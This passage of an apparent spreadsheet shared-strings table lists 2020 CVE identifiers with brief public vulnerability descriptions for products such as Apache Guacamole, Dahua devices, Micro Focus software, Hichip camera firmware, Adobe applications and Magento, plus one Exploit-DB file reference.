    <t>exploits/java/webapps/50178.sh</t>
  </si>
  <si>
    <t>ApacheOfBiz 17.12.01 - Remote Command Execution (RCE)</t>
  </si>
  <si>
    <t>2021-08-04</t>
  </si>
  <si>
    <t>CVE-2020-9497</t>
  </si>
  <si>
    <t>Apache Guacamole 1.1.0 and older do not properly validate datareceived from RDP servers via static virtual channels. If a userconnects to a malicious or compromised RDP server, specially-craftedPDUs could result in disclosure of information within the memory ofthe guacd process handling the connection.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2020-9498</t>
  </si>
  <si>
    <t>Apache Guacamole 1.1.0 and older may mishandle pointers involved inprocessing data received via RDP static virtual channels. If a userconnects to a malicious or compromised RDP server, a series ofspecially-crafted PDUs could result in memory corruption, possiblyallowing arbitrary code to be executed with the privileges of therunning guacd process.</t>
  </si>
  <si>
    <t>CVE-2020-9499</t>
  </si>
  <si>
    <t>Some Dahua products have buffer overflow vulnerabilities. After the successful login of the legal account, the attacker sends a specific DDNS test command, which may cause the device to go down.</t>
  </si>
  <si>
    <t>CVE-2020-9500</t>
  </si>
  <si>
    <t>Some products of Dahua have Denial of Service vulnerabilities. After the successful login of the legal account, the attacker sends a specific log query command, which may cause the device to go down.</t>
  </si>
  <si>
    <t>CVE-2020-9501</t>
  </si>
  <si>
    <t>Attackers can obtain Cloud Key information from the Dahua Web P2P control in specific ways. Cloud Key is used to authenticate the connection between the client tool and the platform. An attacker may use the leaked Cloud Key to impersonate the client to connect to the platform, resulting in additional consumption of platform server resources. Versions with Build time before April 2020 are affected.</t>
  </si>
  <si>
    <t>CVE-2020-9502</t>
  </si>
  <si>
    <t>Some Dahua products with Build time before December 2019 have Session ID predictable vulnerabilities. During normal user access, an attacker can use the predicted Session ID to construct a data packet to attack the device.</t>
  </si>
  <si>
    <t>CVE-2020-9514</t>
  </si>
  <si>
    <t>An issue was discovered in the IMPress for IDX Broker plugin before 2.6.2 for WordPress. wrappers.php allows a logged-in user (with the Subscriber role) to permanently delete arbitrary posts and pages, create new posts with arbitrary subjects, and modify the subjects of existing posts and pages (via create_dynamic_page and delete_dynamic_page).</t>
  </si>
  <si>
    <t>CVE-2020-9517</t>
  </si>
  <si>
    <t>There is an improper restriction of rendered UI layers or frames vulnerability in Micro Focus Service Manager Release Control versions 9.50 and 9.60. The vulnerability may result in the ability of malicious users to perform UI redress attacks.</t>
  </si>
  <si>
    <t>CVE-2020-9518</t>
  </si>
  <si>
    <t>Login filter can access configuration files vulnerability in Micro Focus Service Manager (Web Tier), affecting versions 9.50, 9.51, 9.52, 9.60, 9.61, 9.62. The vulnerability could be exploited to allow unauthorized access to configuration data.</t>
  </si>
  <si>
    <t>CVE-2020-9519</t>
  </si>
  <si>
    <t>HTTP methods reveled in Web services vulnerability in Micro Focus Service manager (server), affecting versions 9.40, 9.41, 9.50, 9.51, 9.52, 9.60, 9.61, 9.62, 9.63. The vulnerability could be exploited to allow exposure of configuration data.</t>
  </si>
  <si>
    <t>CVE-2020-9520</t>
  </si>
  <si>
    <t>A stored XSS vulnerability was discovered in Micro Focus Vibe, affecting all Vibe version prior to 4.0.7. The vulnerability could allows a remote attacker to craft and store malicious content into Vibe such that when the content is viewed by another user of the system, attacker controlled JavaScript will execute in the security context of the target user’s browser.</t>
  </si>
  <si>
    <t>CVE-2020-9521</t>
  </si>
  <si>
    <t>An SQL injection vulnerability was discovered in Micro Focus Service Manager Automation (SMA), affecting versions 2019.08, 2019.05, 2019.02, 2018.08, 2018.05, 2018.02. The vulnerability could allow for the improper neutralization of special elements in SQL commands and may lead to the product being vulnerable to SQL injection.</t>
  </si>
  <si>
    <t>CVE-2020-9522</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in Micro Focus ArcSight Enterprise Security Manager (ESM) product, Affecting versions 7.0.x, 7.2 and 7.2.1 . The vulnerabilities could be remotely exploited resulting in Cross-Site Scripting (XSS) or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9523</t>
  </si>
  <si>
    <t>Insufficiently protected credentials vulnerability on Micro Focus enterprise developer and enterprise server, affecting all version prior to 4.0 Patch Update 16, and version 5.0 Patch Update 6. The vulnerability could allow an attacker to transmit hashed credentials for the user account running the Micro Focus Directory Server (MFDS) to an arbitrary site, compromising that account's security.</t>
  </si>
  <si>
    <t>CVE-2020-9524</t>
  </si>
  <si>
    <t>Cross Site scripting vulnerability on Micro Focus Enterprise Server and Enterprise developer, affecting all versions prior to version 5.0 Patch Update 8. The vulnerability could allow an attacker to trigger administrative actions when an administrator viewed malicious data left by the attacker (stored XSS) or followed a malicious link (reflected XSS).</t>
  </si>
  <si>
    <t>CVE-2020-9525</t>
  </si>
  <si>
    <t>CS2 Network P2P through 3.x, as used in millions of Internet of Things devices, suffers from an authentication flaw that allows remote attackers to perform a man-in-the-middle attack, as demonstrated by eavesdropping on user video/audio streams, capturing credentials, and compromising devices.</t>
  </si>
  <si>
    <t>CVE-2020-9526</t>
  </si>
  <si>
    <t>CS2 Network P2P through 3.x, as used in millions of Internet of Things devices, suffers from an information exposure flaw that exposes user session data to supernodes in the network, as demonstrated by passively eavesdropping on user video/audio streams, capturing credentials, and compromising devices.</t>
  </si>
  <si>
    <t>CVE-2020-9527</t>
  </si>
  <si>
    <t>Firmware developed by Shenzhen Hichip Vision Technology (V6 through V20, after 2018-08-09 through 2020), as used by many different vendors in millions of Internet of Things devices, suffers from buffer overflow vulnerability that allows unauthenticated remote attackers to execute arbitrary code via the peer-to-peer (P2P) service. This affects products marketed under the following brand names: Accfly, Alptop, Anlink, Besdersec, BOAVISION, COOAU, CPVAN, Ctronics, D3D Security, Dericam, Elex System, Elite Security, ENSTER, ePGes, Escam, FLOUREON, GENBOLT, Hongjingtian (HJT), ICAMI, Iegeek, Jecurity, Jennov, KKMoon, LEFTEK, Loosafe, Luowice, Nesuniq, Nettoly, ProElite, QZT, Royallite, SDETER, SV3C, SY2L, Tenvis, ThinkValue, TOMLOV, TPTEK, WGCC, and ZILINK.</t>
  </si>
  <si>
    <t>CVE-2020-9528</t>
  </si>
  <si>
    <t>Firmware developed by Shenzhen Hichip Vision Technology (V6 through V20), as used by many different vendors in millions of Internet of Things devices, suffers from cryptographic issues that allow remote attackers to access user session data, as demonstrated by eavesdropping on user video/audio streams, capturing credentials, and compromising devices. This affects products marketed under the following brand names: Accfly, Alptop, Anlink, Besdersec, BOAVISION, COOAU, CPVAN, Ctronics, D3D Security, Dericam, Elex System, Elite Security, ENSTER, ePGes, Escam, FLOUREON, GENBOLT, Hongjingtian (HJT), ICAMI, Iegeek, Jecurity, Jennov, KKMoon, LEFTEK, Loosafe, Luowice, Nesuniq, Nettoly, ProElite, QZT, Royallite, SDETER, SV3C, SY2L, Tenvis, ThinkValue, TOMLOV, TPTEK, WGCC, and ZILINK.</t>
  </si>
  <si>
    <t>CVE-2020-9529</t>
  </si>
  <si>
    <t>Firmware developed by Shenzhen Hichip Vision Technology (V6 through V20), as used by many different vendors in millions of Internet of Things devices, suffers from a privilege escalation vulnerability that allows attackers on the local network to reset the device's administrator password. This affects products marketed under the following brand names: Accfly, Alptop, Anlink, Besdersec, BOAVISION, COOAU, CPVAN, Ctronics, D3D Security, Dericam, Elex System, Elite Security, ENSTER, ePGes, Escam, FLOUREON, GENBOLT, Hongjingtian (HJT), ICAMI, Iegeek, Jecurity, Jennov, KKMoon, LEFTEK, Loosafe, Luowice, Nesuniq, Nettoly, ProElite, QZT, Royallite, SDETER, SV3C, SY2L, Tenvis, ThinkValue, TOMLOV, TPTEK, WGCC, and ZILINK.</t>
  </si>
  <si>
    <t>CVE-2020-9530</t>
  </si>
  <si>
    <t>An issue was discovered on Xiaomi MIUI V11.0.5.0.QFAEUXM devices. The export component of GetApps(com.xiaomi.mipicks) mishandles the functionality of opening other components. Attackers need to induce users to open specific web pages in a specific network environment. By jumping to the WebView component of Messaging(com.android.MMS) and loading malicious web pages, information leakage can occur. This is fixed on version: 2001122; 11.0.1.54.</t>
  </si>
  <si>
    <t>CVE-2020-9531</t>
  </si>
  <si>
    <t>An issue was discovered on Xiaomi MIUI V11.0.5.0.QFAEUXM devices. In the Web resources of GetApps(com.xiaomi.mipicks), the parameters passed in are read and executed. After reading the resource files, relevant components open the link of the incoming URL. Although the URL is safe and can pass security detection, the data carried in the parameters are loaded and executed. An attacker can use NFC tools to get close enough to a user's unlocked phone to cause apps to be installed and information to be leaked. This is fixed on version: 2001122.</t>
  </si>
  <si>
    <t>CVE-2020-9534</t>
  </si>
  <si>
    <t>fmwlan.c on D-Link DIR-615Jx10 devices has a stack-based buffer overflow via the formWlanSetup webpage parameter when f_radius_ip1 is malformed.</t>
  </si>
  <si>
    <t>CVE-2020-9535</t>
  </si>
  <si>
    <t>fmwlan.c on D-Link DIR-615Jx10 devices has a stack-based buffer overflow via the formWlanSetup_Wizard webpage parameter when f_radius_ip1 is malformed.</t>
  </si>
  <si>
    <t>CVE-2020-9540</t>
  </si>
  <si>
    <t>Sophos HitmanPro.Alert before build 861 allows local elevation of privilege.</t>
  </si>
  <si>
    <t>CVE-2020-9543</t>
  </si>
  <si>
    <t>OpenStack Manila &lt;7.4.1, &gt;=8.0.0 &lt;8.1.1, and &gt;=9.0.0 &lt;9.1.1 allows attackers to view, update, delete, or share resources that do not belong to them, because of a context-free lookup of a UUID. Attackers may also create resources, such as shared file systems and groups of shares on such share networks.</t>
  </si>
  <si>
    <t>CVE-2020-9544</t>
  </si>
  <si>
    <t>An issue was discovered on D-Link DSL-2640B E1 EU_1.01 devices. The administrative interface doesn't perform authentication checks for a firmware-update POST request. Any attacker that can access the administrative interface can install firmware of their choice.</t>
  </si>
  <si>
    <t>CVE-2020-9545</t>
  </si>
  <si>
    <t>Pale Moon 28.x before 28.8.4 has a segmentation fault related to module scripting, as demonstrated by a Lacoste web site.</t>
  </si>
  <si>
    <t>CVE-2020-9546</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config).</t>
  </si>
  <si>
    <t>CVE-2020-9547</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap).</t>
  </si>
  <si>
    <t>CVE-2020-9548</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).</t>
  </si>
  <si>
    <t>CVE-2020-9549</t>
  </si>
  <si>
    <t>In PDFResurrect 0.12 through 0.19, get_type in pdf.c has an out-of-bounds write via a crafted PDF document.</t>
  </si>
  <si>
    <t>CVE-2020-9550</t>
  </si>
  <si>
    <t>Rubetek SmartHome 2020 devices use unencrypted 433 MHz communication between controllers and beacons, allowing an attacker to sniff and spoof beacon requests remotely.</t>
  </si>
  <si>
    <t>CVE-2020-9551</t>
  </si>
  <si>
    <t>Adobe Bridge versions 10.0 have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9552</t>
  </si>
  <si>
    <t>Adobe Bridge versions 10.0 have a heap-based buffer overflow vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9553</t>
  </si>
  <si>
    <t>Adobe Bridge versions 10.0.1 and earlier version have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9554</t>
  </si>
  <si>
    <t>Adobe Bridge versions 10.0.1 and earlier version have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9555</t>
  </si>
  <si>
    <t>Adobe Bridge versions 10.0.1 and earlier version have a stack-based buffer overflow vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9556</t>
  </si>
  <si>
    <t>CVE-2020-9557</t>
  </si>
  <si>
    <t>CVE-2020-9558</t>
  </si>
  <si>
    <t>CVE-2020-9559</t>
  </si>
  <si>
    <t>CVE-2020-9560</t>
  </si>
  <si>
    <t>CVE-2020-9561</t>
  </si>
  <si>
    <t>CVE-2020-9562</t>
  </si>
  <si>
    <t>Adobe Bridge versions 10.0.1 and earlier version have a heap overflow vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9563</t>
  </si>
  <si>
    <t>CVE-2020-9564</t>
  </si>
  <si>
    <t>CVE-2020-9565</t>
  </si>
  <si>
    <t>CVE-2020-9566</t>
  </si>
  <si>
    <t>Adobe Bridge versions 10.0.1 and earlier version have an use after free vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9567</t>
  </si>
  <si>
    <t>CVE-2020-9568</t>
  </si>
  <si>
    <t>Adobe Bridge versions 10.0.1 and earlier version have a memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9569</t>
  </si>
  <si>
    <t>CVE-2020-9570</t>
  </si>
  <si>
    <t>Adobe Illustrator versions 24.0.2 and earlier have a memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9571</t>
  </si>
  <si>
    <t>Adobe Illustrator versions 24.0.2 and earlier have a memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9572</t>
  </si>
  <si>
    <t>CVE-2020-9573</t>
  </si>
  <si>
    <t>CVE-2020-9574</t>
  </si>
  <si>
    <t>CVE-2020-9575</t>
  </si>
  <si>
    <t>Adobe Illustrator versions 24.1.2 and earlier have a memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9576</t>
  </si>
  <si>
    <t>Magento versions 2.3.4 and earlier, 2.2.11 and earlier (see note), 1.14.4.4 and earlier, and 1.9.4.4 and earlier have a command injection vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9577</t>
  </si>
  <si>
    <t>Magento versions 2.3.4 and earlier, 2.2.11 and earlier (see note), 1.14.4.4 and earlier, and 1.9.4.4 and earlier have a stored cross-site scripting vulnerability. Successful exploitation could lead to sensitive information disclosure .</t>
  </si>
  <si>
    <t>CVE-2020-9578</t>
  </si>
  <si>
    <t>CVE-2020-9579</t>
  </si>
  <si>
    <t>Magento versions 2.3.4 and earlier, 2.2.11 and earlier (see note), 1.14.4.4 and earlier, and 1.9.4.4 and earlier have a security mitigation bypass vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9580</t>
  </si>
  <si>
    <t>CVE-2020-9581</t>
  </si>
  <si>
    <t>Magento versions 2.3.4 and earlier, 2.2.11 and earlier (see note), 1.14.4.4 and earlier, and 1.9.4.4 and earlier have a stored cross-site scripting vulnerability. Successful exploitation could lead to sensitive information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9582</t>
  </si>
  <si>
    <t>CVE-2020-9583</t>
  </si>
  <si>
    <t>CVE-2020-9584</t>
  </si>
  <si>
    <t>CVE-2020-9585</t>
  </si>
  <si>
    <t>Magento versions 2.3.4 and earlier, 2.2.11 and earlier (see note), 1.14.4.4 and earlier, and 1.9.4.4 and earlier have a defense-in-depth security mitigation vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9586</t>
  </si>
  <si>
    <t>Adobe Character Animator versions 3.2 and earlier have a buffer overflow vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9587</t>
  </si>
  <si>
    <t>Magento versions 2.3.4 and earlier, 2.2.11 and earlier (see note), 1.14.4.4 and earlier, and 1.9.4.4 and earlier have an authorization bypass vulnerability. Successful exploitation could lead to potentially unauthorized product discounts.</t>
  </si>
  <si>
    <t>CVE-2020-9588</t>
  </si>
  <si>
    <t>Magento versions 2.3.4 and earlier, 2.2.11 and earlier (see note), 1.14.4.4 and earlier, and 1.9.4.4 and earlier have an observable timing discrepancy vulnerability. Successful exploitation could lead to signature verification bypass.</t>
  </si>
  <si>
    <t>CVE-2020-9589</t>
  </si>
  <si>
    <t>Adobe DNG Software Development Kit (SDK) 1.5 and earlier versions have a heap overflow vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9590</t>
  </si>
  <si>
    <t>CVE-2020-9591</t>
  </si>
  <si>
    <t>Magento versions 2.3.4 and earlier, 2.2.11 and earlier (see note), 1.14.4.4 and earlier, and 1.9.4.4 and earlier have a defense-in-depth security mitigation vulnerability. Successful exploitation could lead to unauthorized access to admin panel.</t>
  </si>
  <si>
    <t>CVE-2020-9592</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20042 and earlier, 2017.011.30166 and earlier, 2017.011.30166 and earlier, and 2015.006.30518 and earlier have a security bypass vulnerability. Successful exploitation could lead to security feature bypass.</t>
  </si>
  <si>
    <t>CVE-2020-9593</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20042 and earlier, 2017.011.30166 and earlier, 2017.011.30166 and earlier, and 2015.006.30518 and earlier have an invalid memory access vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9594</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20042 and earlier, 2017.011.30166 and earlier, 2017.011.30166 and earlier, and 2015.006.30518 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9595</t>
  </si>
  <si>
    <t>CVE-2020-9596</t>
  </si>
  <si>
    <t>CVE-2020-9597</t>
  </si>
  <si>
    <t>CVE-2020-9598</t>
  </si>
  <si>
    <t>CVE-2020-9599</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20042 and earlier, 2017.011.30166 and earlier, 2017.011.30166 and earlier, and 2015.006.30518 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9600</t>
  </si>
  <si>
    <t>CVE-2020-9601</t>
  </si>
  <si>
    <t>CVE-2020-9602</t>
  </si>
  <si>
    <t>CVE-2020-9603</t>
  </si>
  <si>
    <t>CVE-2020-9604</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20042 and earlier, 2017.011.30166 and earlier, 2017.011.30166 and earlier, and 2015.006.30518 and earlier have a buffer error vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9605</t>
  </si>
  <si>
    <t>CVE-2020-9606</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20042 and earlier, 2017.011.30166 and earlier, 2017.011.30166 and earlier, and 2015.006.30518 and earlier have an use-after-free vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9607</t>
  </si>
  <si>
    <t>CVE-2020-9608</t>
  </si>
  <si>
    <t>CVE-2020-9609</t>
  </si>
  <si>
    <t>CVE-2020-9610</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20042 and earlier, 2017.011.30166 and earlier, 2017.011.30166 and earlier, and 2015.006.30518 and earlier have a null pointer vulnerability. Successful exploitation could lead to application denial-of-service.</t>
  </si>
  <si>
    <t>CVE-2020-9611</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20042 and earlier, 2017.011.30166 and earlier, 2017.011.30166 and earlier, and 2015.006.30518 and earlier have a stack exhaustion vulnerability. Successful exploitation could lead to application denial-of-service.</t>
  </si>
  <si>
    <t>CVE-2020-9612</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20042 and earlier, 2017.011.30166 and earlier, 2017.011.30166 and earlier, and 2015.006.30518 and earlier have a heap overflow vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9613</t>
  </si>
  <si>
    <t>CVE-2020-9614</t>
  </si>
  <si>
    <t>CVE-2020-9615</t>
  </si>
  <si>
    <t>Adobe Acrobat and Reader versions 2020.006.20042 and earlier, 2017.011.30166 and earlier, 2017.011.30166 and earlier, and 2015.006.30518 and earlier have a race condition vulnerability. Successful exploitation could lead to security feature bypass.</t>
  </si>
  <si>
    <t>CVE-2020-9616</t>
  </si>
  <si>
    <t>Adobe Premiere Pro versions 14.1 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9617</t>
  </si>
  <si>
    <t>Adobe Premiere Rush versions 1.5.8 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9618</t>
  </si>
  <si>
    <t>Adobe Audition versions 13.0.5 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9620</t>
  </si>
  <si>
    <t>CVE-2020-9621</t>
  </si>
  <si>
    <t>CVE-2020-9622</t>
  </si>
  <si>
    <t>Adobe DNG Software Development Kit (SDK) 1.5 and earlier versions have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9623</t>
  </si>
  <si>
    <t>CVE-2020-9624</t>
  </si>
  <si>
    <t>CVE-2020-9625</t>
  </si>
  <si>
    <t>CVE-2020-9626</t>
  </si>
  <si>
    <t>CVE-2020-9627</t>
  </si>
  <si>
    <t>CVE-2020-9628</t>
  </si>
  <si>
    <t>CVE-2020-9629</t>
  </si>
  <si>
    <t>CVE-2020-9630</t>
  </si>
  <si>
    <t>Magento versions 2.3.4 and earlier, 2.2.11 and earlier (see note), 1.14.4.4 and earlier, and 1.9.4.4 and earlier have a business logic error vulnerability. Successful exploitation could lead to privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-9631</t>
  </si>
  <si>
    <t>CVE-2020-9632</t>
  </si>
  <si>
    <t>CVE-2020-9633</t>
  </si>
  <si>
    <t>Adobe Flash Player Desktop Runtime 32.0.0.371 and earlier, Adobe Flash Player for Google Chrome 32.0.0.371 and earlier, and Adobe Flash Player for Microsoft Edge and Internet Explorer 32.0.0.330 and earlier have an use after free vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9634</t>
  </si>
  <si>
    <t>Adobe Framemaker versions 2019.0.5 and below have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9635</t>
  </si>
  <si>
    <t>CVE-2020-9636</t>
  </si>
  <si>
    <t>Adobe Framemaker versions 2019.0.5 and below have a memory corruption vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9637</t>
  </si>
  <si>
    <t>Adobe After Effects versions 17.1 and earlier have a heap overflow vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9638</t>
  </si>
  <si>
    <t>CVE-2020-9639</t>
  </si>
  <si>
    <t>CVE-2020-9640</t>
  </si>
  <si>
    <t>CVE-2020-9641</t>
  </si>
  <si>
    <t>CVE-2020-9642</t>
  </si>
  <si>
    <t>Adobe Illustrator versions 24.1.2 and earlier have a buffer errors vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9643</t>
  </si>
  <si>
    <t>CVE-2020-9644</t>
  </si>
  <si>
    <t>Adobe Experience Manager versions 6.5 and earlier have a cross-site scripting (stored) vulnerability. Successful exploitation could lead to arbitrary javascript execution in the browser.</t>
  </si>
  <si>
    <t>CVE-2020-9645</t>
  </si>
  <si>
    <t>Adobe Experience Manager versions 6.5 and earlier have a blind server-side request forgery (ssrf) vulnerability. Successful exploitation could lead to sensitive information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9646</t>
  </si>
  <si>
    <t>Adobe Media Encoder versions 14.2 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9647</t>
  </si>
  <si>
    <t>Adobe Experience Manager versions 6.5 and earlier have a cross-site scripting (dom-based) vulnerability. Successful exploitation could lead to arbitrary javascript execution in the browser.</t>
  </si>
  <si>
    <t>CVE-2020-9648</t>
  </si>
  <si>
    <t>Adobe Experience Manager versions 6.5 and earlier have a cross-site scripting vulnerability. Successful exploitation could lead to arbitrary javascript execution in the browser.</t>
  </si>
  <si>
    <t>CVE-2020-9649</t>
  </si>
  <si>
    <t>Adobe Media Encoder versions 14.2 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9650</t>
  </si>
  <si>
    <t>CVE-2020-9651</t>
  </si>
  <si>
    <t>Adobe Experience Manager versions 6.5 and earlier have a cross-site scripting (reflected) vulnerability. Successful exploitation could lead to arbitrary javascript execution in the browser.</t>
  </si>
  <si>
    <t>CVE-2020-9652</t>
  </si>
  <si>
    <t>Adobe Premiere Pro versions 14.2 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9653</t>
  </si>
  <si>
    <t>Adobe Premiere Pro versions 14.2 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9654</t>
  </si>
  <si>
    <t>CVE-2020-9655</t>
  </si>
  <si>
    <t>Adobe Premiere Rush versions 1.5.12 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9656</t>
  </si>
  <si>
    <t>Adobe Premiere Rush versions 1.5.12 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9657</t>
  </si>
  <si>
    <t>CVE-2020-9658</t>
  </si>
  <si>
    <t>Adobe Audition versions 13.0.6 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9659</t>
  </si>
  <si>
    <t>CVE-2020-9660</t>
  </si>
  <si>
    <t>Adobe After Effects versions 17.1 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9661</t>
  </si>
  <si>
    <t>Adobe After Effects versions 17.1 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to arbitrary code execution .</t>
  </si>
  <si>
    <t>CVE-2020-9662</t>
  </si>
  <si>
    <t>CVE-2020-9663</t>
  </si>
  <si>
    <t>Adobe Reader Mobile versions 20.0.1 and earlier have a directory traversal vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9664</t>
  </si>
  <si>
    <t>Magento versions 1.14.4.5 and earlier, and 1.9.4.5 and earlier have a php object injection vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9665</t>
  </si>
  <si>
    <t>Magento versions 1.14.4.5 and earlier, and 1.9.4.5 and earlier have a stored cross-site scripting vulnerability. Successful exploitation could lead to sensitive information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9666</t>
  </si>
  <si>
    <t>Adobe Campaign Classic before 20.2 have an out-of-bounds read vulnerability. Successful exploitation could lead to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-9667</t>
  </si>
  <si>
    <t>Adobe Genuine Service version 6.6 (and earlier) is affected by an Uncontrolled Search Path element vulnerability. An authenticated attacker with admin privileges could plant custom binaries and execute them with System permissions. Exploitation of this issue requires user interaction.</t>
  </si>
  <si>
    <t>CVE-2020-9668</t>
  </si>
  <si>
    <t>Adobe Genuine Service version 6.6 (and earlier) is affected by an Improper Access control vulnerability when handling symbolic links. An unauthenticated attacker could exploit this to elevate privileges in the context of the current user.</t>
  </si>
  <si>
    <t>CVE-2020-9669</t>
  </si>
  <si>
    <t>Adobe Creative Cloud Desktop Application versions 5.1 and earlier have a lack of exploit mitigations vulnerability. Successful exploitation could lead to privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-9670</t>
  </si>
  <si>
    <t>Adobe Creative Cloud Desktop Application versions 5.1 and earlier have a symlink vulnerability vulnerability. Successful exploitation could lead to privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-9671</t>
  </si>
  <si>
    <t>Adobe Creative Cloud Desktop Application versions 5.1 and earlier have an insecure file permissions vulnerability. Successful exploitation could lead to privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-9672</t>
  </si>
  <si>
    <t>Adobe ColdFusion 2016 update 15 and earlier versions, and ColdFusion 2018 update 9 and earlier versions have a dll search-order hijacking vulnerability. Successful exploitation could lead to privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2020-9673</t>
  </si>
  <si>
    <t>CVE-2020-9674</t>
  </si>
  <si>
    <t>Adobe Bridge versions 10.0.3 and earlier have an out-of-bounds write vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2020-9675</t>
  </si>
  <si>
    <t>Adobe Bridge versions 10.0.3 and earlier have an out-of-bounds read vulnerability. Successful exploitation could lead to arbitrary code execution.</t>
